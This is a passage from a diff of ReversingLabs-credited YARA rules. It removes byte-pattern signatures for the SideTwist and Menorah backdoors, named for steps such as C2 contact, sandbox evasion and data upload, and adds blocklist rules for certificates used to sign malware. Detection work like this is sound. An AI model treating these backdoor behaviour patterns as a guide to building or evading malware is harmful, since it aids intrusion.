FF C9 03 C9 74 ?? 8B D1 48 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? EB ?? 48 8B F3 49 89 B7 ?? ?? ?? ?? 48 85 F6 0F 84 ?? ?? ?? ?? 44 8B - } - $create_cab_file_and_upload_p3 = { - 44 24 ?? 4D 8B CE 49 8B D4 48 8B CE 44 89 6C 24 ?? E8 ?? ?? ?? ?? 49 8B 8F ?? ?? ?? - ?? 48 85 C9 74 ?? E8 ?? ?? ?? ?? 49 8B CC 49 89 9F ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 - 83 C9 ?? 33 C0 48 8D BD ?? ?? ?? ?? 66 F2 AF 48 F7 D1 41 8D 84 4D ?? ?? ?? ?? B9 ?? - ?? ?? ?? 8B D0 89 44 24 ?? FF 15 ?? ?? ?? ?? 4C 8B E8 48 85 C0 0F 84 ?? ?? ?? ?? 44 - 8B 44 24 ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 8B 54 24 ?? 4C 8D 8D ?? ?? ?? ?? 4C 8D 05 - ?? ?? ?? ?? 49 8B CD E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 49 8B D6 8B C8 4C 8B C7 89 44 24 - ?? 49 03 CD E8 ?? ?? ?? ?? 8B 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 03 CF 41 B8 ?? ?? ?? - ?? 49 03 CD E8 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 49 8D 8F ?? ?? ?? ?? E8 ?? ?? - ?? ?? 45 33 C9 45 33 C0 41 8D 51 ?? 33 C9 89 5C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F0 48 - 85 C0 0F 84 ?? ?? ?? ?? 48 89 5C 24 ?? 89 5C 24 ?? 49 8D 97 ?? ?? ?? ?? 41 B8 ?? ?? - ?? ?? 45 33 C9 48 8B C8 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 5C 24 - ?? FF 15 ?? ?? ?? ?? 4C 8B E0 48 85 C0 0F 84 ?? ?? ?? ?? 49 8D 8F ?? ?? ?? ?? 33 D2 - 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4D 8D 8F ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 49 8D 8F - ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 7C 24 ?? E8 ?? ?? ?? ?? 48 89 5C 24 ?? C7 44 24 ?? - ?? ?? ?? ?? 4D 8D 87 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 45 33 C9 49 8B CC 48 89 5C 24 - ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 5C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 - } - $create_cab_file_and_upload_p4 = { - 8B 44 24 ?? 48 8D 15 ?? ?? ?? ?? 4D 8B CD 41 B8 ?? ?? ?? ?? 48 8B CF 89 44 24 ?? FF - 15 ?? ?? ?? ?? 85 C0 74 ?? 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 45 33 C9 45 33 - C0 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 75 ?? 45 33 C9 45 33 C0 33 D2 48 8B CF FF 15 ?? - ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 49 8B CC FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? - ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? FF C0 B9 ?? ?? ?? ?? 8B - D0 89 44 24 ?? FF 15 ?? ?? ?? ?? 4C 8B E8 48 85 C0 75 ?? 45 33 C9 45 33 C0 33 D2 48 - 8B CF FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 49 8B CC FF 15 ?? ?? ?? ?? 48 8B - CE FF 15 ?? ?? ?? ?? 83 C8 ?? EB ?? 44 8B 44 24 ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 44 - 8B 44 24 ?? 4C 8D 4C 24 ?? 49 8B D5 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 - ?? ?? ?? ?? 49 8B CD E8 ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? - 45 33 C9 45 33 C0 33 D2 48 8B CF FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 49 8B - CC FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 8B C3 4C 8B B4 24 ?? ?? ?? ?? 4C 8B - AC 24 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? - ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5C 5F 5E 5D C3 - } - $cmd_expand_payload_p1 = { - 40 53 55 41 55 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? - ?? ?? 48 8B E9 48 8D 8C 24 ?? ?? ?? ?? 45 33 ED 33 D2 41 B8 ?? ?? ?? ?? 66 44 89 AC - 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 44 - 89 AC 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 45 8D 45 ?? 48 8D 4C 24 ?? 33 D2 44 89 6C 24 ?? - E8 ?? ?? ?? ?? 33 C0 4C 89 6C 24 ?? 45 8D 45 ?? 45 33 C9 BA ?? ?? ?? ?? 48 8B CD C7 - 44 24 ?? ?? ?? ?? ?? 4C 89 6C 24 ?? 48 89 44 24 ?? 48 89 44 24 ?? C7 44 24 ?? ?? ?? - ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 0B C0 E9 ?? ?? ?? ?? 45 33 C9 33 - D2 48 8B C8 45 8D 41 ?? 4C 89 6C 24 ?? 48 89 BC 24 ?? ?? ?? ?? 44 89 6C 24 ?? FF 15 - ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 48 8B CB FF 15 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? - ?? 45 33 C9 45 33 C0 48 8B C8 41 8D 51 ?? 48 89 B4 24 ?? ?? ?? ?? 4C 89 6C 24 ?? FF - 15 ?? ?? ?? ?? 48 8B F0 48 85 C0 75 ?? 48 8B CB FF 15 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? - ?? ?? 4C 8D 40 ?? 48 8D 84 24 ?? ?? ?? ?? 41 83 C9 ?? 33 D2 33 C9 C7 44 24 ?? ?? ?? - ?? ?? 48 89 44 24 ?? 4C 89 A4 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? - 33 D2 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? - ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 - } - $cmd_expand_payload_p2 = { - 44 8B 66 ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? - ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? - ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 4C 8B CD BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 44 24 - ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 4C - 89 6C 24 ?? 4C 89 6C 24 ?? 45 33 C0 33 C9 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? - ?? ?? 66 44 89 AC 24 ?? ?? 00 00 44 89 6C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 83 C8 - ?? EB ?? 90 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C9 4C 89 6C 24 ?? 48 8D 0D ?? ?? - ?? ?? 45 8D 41 ?? BA ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 8B CB - FF 15 ?? ?? ?? ?? 41 8B C4 4C 8B A4 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 8B BC - 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? - 41 5D 5D 5B C3 - } - condition: - uint16(0)==0x5A4D and ( all of ($network_communication_p*)) and ( all of ($handle_c2_commands_p*)) and ( all of ($create_cab_file_and_upload_p*)) and ( all of ($cmd_expand_payload_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "WATER, s.r.o." and pe.signatures[i].serial=="28:c5:7d:f0:9c:e7:cc:3f:de:22:43:be:b4:d0:01:01" and 1622678400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Backdoor_Sidetwist : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_2D8Cfcf04209Dc7F771D8D18E462C35A : INFO FILE { meta: - description = "Yara rule that detects SideTwist backdoor." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "979b442e-8739-54a8-b486-39fc5673791e" - date = "2024-03-18" - modified = "2024-03-18" + id = "5ce5c076-87de-50f0-9fa1-a3efef8dd7f8" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/backdoor/Win64.Backdoor.SideTwist.yara#L1-L154" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "811fa73ede59493c71435743848a3fce3a1604ec4065ffcb0b43e9715dfa5c31" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11938-L11954" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2b784e46268d78046365400ef914d7ca673503c93962d0b0740ca2ac9faf7857" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Backdoor" - tc_detection_name = "SideTwist" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $anti_sandbox_detect_environment = { - 55 57 56 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 89 4D ?? 48 89 55 ?? E8 ?? - ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 8D 55 ?? 48 8D 45 ?? 4C - 8D 05 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 85 C0 75 ?? 48 8B 45 ?? 48 85 - C0 74 ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 48 8D 45 ?? 48 - 89 C1 E8 ?? ?? ?? ?? 48 8B 55 ?? 48 8D 4D ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? - ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 - ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 - E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF - D0 85 C0 0F 94 C0 84 C0 74 ?? 48 8D 05 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF - D0 BB ?? ?? ?? ?? BE ?? ?? ?? ?? EB - } - $collect_host_information = { - 55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? C7 45 ?? - ?? ?? ?? ?? 8B 45 ?? 89 C0 48 BA ?? ?? ?? ?? ?? ?? ?? ?? 48 39 C2 72 ?? 48 01 C0 48 - 89 C1 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 - 8B 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? - 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 49 89 D0 48 89 C2 B9 ?? - ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 85 C0 0F 95 C0 84 C0 0F 84 ?? ?? ?? ?? 48 8D 45 - ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 4D ?? 48 8B 55 ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 - ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? - 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 - 89 C2 48 8D 4D ?? 48 8D 45 ?? 49 89 C9 49 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? - 48 8D 55 ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? - 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? - 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 - ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 45 ?? 48 8D 15 ?? - ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 89 - C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 - C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D - 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 - 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? - 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 8B 45 ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3 - } - $contact_c2_server = { - 55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? 48 8D 45 - ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 8D 15 ?? ?? - ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 50 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? - ?? ?? 48 8B 55 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 4C 8D 45 - ?? 48 8B 55 ?? 48 8D 8D ?? ?? ?? ?? 48 89 4C 24 ?? 48 8D 4D ?? 48 89 4C 24 ?? 4D 89 - C1 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? - 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 - 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 - E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? - ?? 48 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 4D ?? 48 8D 55 ?? - 48 8B 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? BB - ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 89 D8 - EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 - C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? - 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 89 - C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 - E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3 - } - $parse_c2_response = { - 55 53 48 83 EC ?? 48 8D 6C 24 ?? 48 89 4D ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 - 8D 55 ?? 48 8D 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 - ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? - ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 - ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C1 48 8B 55 ?? 48 - 8B 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B - 55 ?? 48 01 C2 48 8B 45 ?? 49 89 D0 BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 - ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 - D8 48 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 - 89 C1 E8 ?? ?? ?? ?? 90 48 83 C4 ?? 5B 5D C3 - } - $download_file_from_c2_p1 = { - 55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? 4C 89 45 - ?? 4C 89 4D ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 5D ?? 48 8B 55 ?? - 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? - ?? 49 89 D0 48 89 C2 48 89 D9 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 88 45 ?? 48 8D 85 ?? ?? - ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 0F B6 45 ?? 83 F0 ?? 84 C0 0F 84 ?? ?? ?? ?? 48 8D 85 - ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? - 48 89 C2 48 8D 85 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF - D0 89 45 ?? 83 7D ?? ?? 0F 95 C0 84 C0 74 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 - 8D 55 ?? 48 8B 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 - ?? 48 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 9D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? - 48 89 C1 E8 ?? ?? ?? ?? 48 89 C2 48 8B 45 ?? 49 89 D9 49 89 D0 BA ?? ?? ?? ?? 48 89 - C1 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 8D 45 ?? 48 - } - $download_file_from_c2_p2 = { - 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 - E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 8D 45 ?? 48 8B 55 ?? 49 - 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 - ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 4D ?? 48 8D 55 ?? 49 89 C8 48 - 89 C1 E8 ?? ?? ?? ?? 90 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 - ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? - ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? - EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 - C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 - 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 8B - 45 ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3 - } - $reply_to_c2_server = { - 55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? 4C 89 45 - ?? 4C 89 4D ?? 48 8B 55 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? - 48 8B 55 ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8B 55 ?? 49 89 - D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 ?? - ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 8D ?? ?? ?? ?? 48 8D 55 ?? 49 89 - C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 - ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 - ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? - 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB - ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 - E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 - 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 - C4 ?? ?? ?? ?? 5B 5D C3 - } - condition: - uint16(0)==0x5A4D and ($anti_sandbox_detect_environment) and ($collect_host_information) and ($contact_c2_server) and ($parse_c2_response) and ( all of ($download_file_from_c2_p*)) and ($reply_to_c2_server) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AA PLUS INVEST d.o.o." and pe.signatures[i].serial=="2d:8c:fc:f0:42:09:dc:7f:77:1d:8d:18:e4:62:c3:5a" and 1631491200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Menorah : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_016836311Fc39Fbb8E6F308Bb03Cc2B3 : INFO FILE { meta: - description = "Yara rule that detects Menorah backdoor." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4f13a6c6-bd97-58aa-ac3b-399866b5c63b" - date = "2024-05-10" - modified = "2024-05-10" + id = "2c4061e8-0b8e-5c33-a746-6557449b17ed" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/backdoor/ByteCode.MSIL.Backdoor.Menorah.yara#L1-L169" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "770aefca192ceb3a778c0b1259105ace8e64cb35d0c34acb15c45fb6f22ad94b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11956-L11972" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c5f6372a207d02283840e745619e93194d954eedff7bae34aadcb645b1cb78fc" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Backdoor" - tc_detection_name = "Menorah" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $send_fingerprint_to_c2_p1 = { - 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A - 73 ?? ?? ?? ?? 19 1F 0E 6F ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 1F 5B 13 ?? 12 ?? 28 ?? ?? - ?? ?? 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 5D 13 ?? - 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 25 16 1F 5B 13 ?? 12 ?? 28 ?? - ?? ?? ?? A2 25 17 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 06 A2 25 19 1F 40 13 ?? - 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 5D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F - ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 0D 1F 3F 13 ?? 12 - ?? 28 ?? ?? ?? ?? 17 16 28 ?? ?? ?? ?? 1F 3D 13 ?? 12 ?? 28 ?? ?? ?? ?? 17 16 28 ?? - ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 03 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? - 13 ?? 11 ?? 1F 50 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 4F 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 53 - 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 54 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? - ?? ?? 11 ?? 1F 21 8D ?? ?? ?? ?? 25 16 1F 61 13 ?? 12 ?? 28 ?? ?? 